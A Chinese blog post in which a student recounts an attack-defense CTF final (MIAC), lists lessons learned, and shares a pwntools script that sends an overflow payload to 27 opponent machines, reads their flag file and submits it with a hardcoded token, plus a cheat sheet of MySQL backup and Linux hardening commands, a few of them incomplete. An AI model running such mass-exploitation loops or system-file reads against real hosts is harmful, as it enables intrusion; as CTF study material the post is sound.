第四届MIAC线下总结

虽然我已经大三了,可是线下这是第二次,表示体验真的是非常不好,不过还是知道自己还是有很多东西要学习

1、环境

这是MIAC在决赛,这时不得不提初赛,第一个初赛直接被各种大佬打爆平台,导致所有队伍全部被改名字,主办方只好取消。后面两次虽然成功,但是结果仍然让我们出乎意料(一般都是前20进入决赛,这是前80,难以想象[这里后面证明是正确的])。

2、比赛

比赛前一晚:看了比赛规则,发现有一台靶机和一台攻击机机(这是啥),一小时一轮,一个三轮(后面怀疑主办方的说明,居然一个小时一个题目[一个5小轮])。于是开始准备各种工具,自动提交flag脚本,通防工具,提取脚本,木马(后来都输给了主板方)。
比赛前:80个队伍,做得位置全部不知道(蒙)。终于进场了,都是找了好久,终于找到位置。发现我们只能用攻击机工具别人的靶机(类似实验吧)。
第一轮:葛师傅和潘师傅找到web题目,我在找pwn题目(最后,,,一个小时过去了,找不到题目,发现根本没有pwn题目),葛师傅很气愤,因为题目不能下下来。而且,自己电脑和靶机电脑是网络隔离的。不能用ssh连接。
第二轮:潘师傅和葛师傅找到mysql的弱密码,然后开始写文件进去,读文件出来,但是不知道为什么不能读到flag,而我只能在那里维护,看看那些ip来连接了我们,然后去杀掉pid.
第三轮:mysql的弱密码,这里可以读取flag了。可是这里主办方的flag不能及时刷新,导致我们提交的flag不对,这里问技术人员,他说赛后在谈论。

3、总结

1、首先这个比赛没有pwn题,那bin师傅只能看看屏幕了。
2、对比赛规则要仔细研究
3、liunx下的命令要熟悉

总结:
1、一上去可以连接上去,先备份一下所有的镜像文件。
2、修改自己的靶机(服务器)的密码,mysql的密码
3、看看有哪些题目
4、先挂上通防,等主办方来警告就撤下来

4、脚本

这里pwn题自动提交flag脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
from pwn import *
import requests
import time
context(arch = 'amd64')
while 1:
start = time.time()
#p = process('./pwn')
for i in range(1, 28):
try:
#if i == 25:
# continue
p = remote('172.16.%s.102' % i,20002)
p.recv()
payload="a"*213
p.sendline(payload)
timestart = time.time()
p.sendline('cat /home/newcalc/flag')
a = p.recvline(timeout=5)
print "============="
print a[2:]
url_platform = 'http://172.16.200.3:9000/submit_flag/'
token = 'L4FBjK6K3nhkTcFMcwDGuWOwqR9GYbghNbtmOc49wjRiKS60SoILVjFgMpj3Etcx7R0wMIrB1os'
post_data = {
'token':token,
'flag':a[2:]
}
r = requests.post(url_platform, data = post_data)
timenow = time.time()-timestart
if(timenow == 5):
continue
#p.interactive()
except:
pass
end = time.time()
time.sleep(300 - (end -start))

这里是liunx命令:
备份数据库
mysqldump -u 用户名 -p 密码 数据库名 > back.sql
mysqldump -u root -p 123456 mysql > back.sql
备份所有数据库
mysqldump --all-databases > bak.sql
还原数据库

1
2
3
4
mysql -u 用户名 -p 密码 数据库名 < bak.sql
find / *.php -perm
awk -F: /etc/passwd
crontab -l

查看那些端口开放
netstat -pantu

ps -anu

杀死PID
kill 9511
查看tcp连接的数量
netstat -ant|awk |grep |sed -e -e |sort|uniq -c|sort -rn
找到某个文件
find / -name 文件名
解压
tar -xvf file.tar
unzip file.zip
unrar e file.rar
连接ssh

1
2
3
4
ssh root@192.168.1.14
yes
password
ifconfig

登录mysql数据库

1
2
mysql -u root -h -p123456
ifconfig

将/var/www/html目录下的文件设置为不允许任何人修改
chattr -R +i /var/www/html

Donate
-------------本文结束感谢您的阅读-------------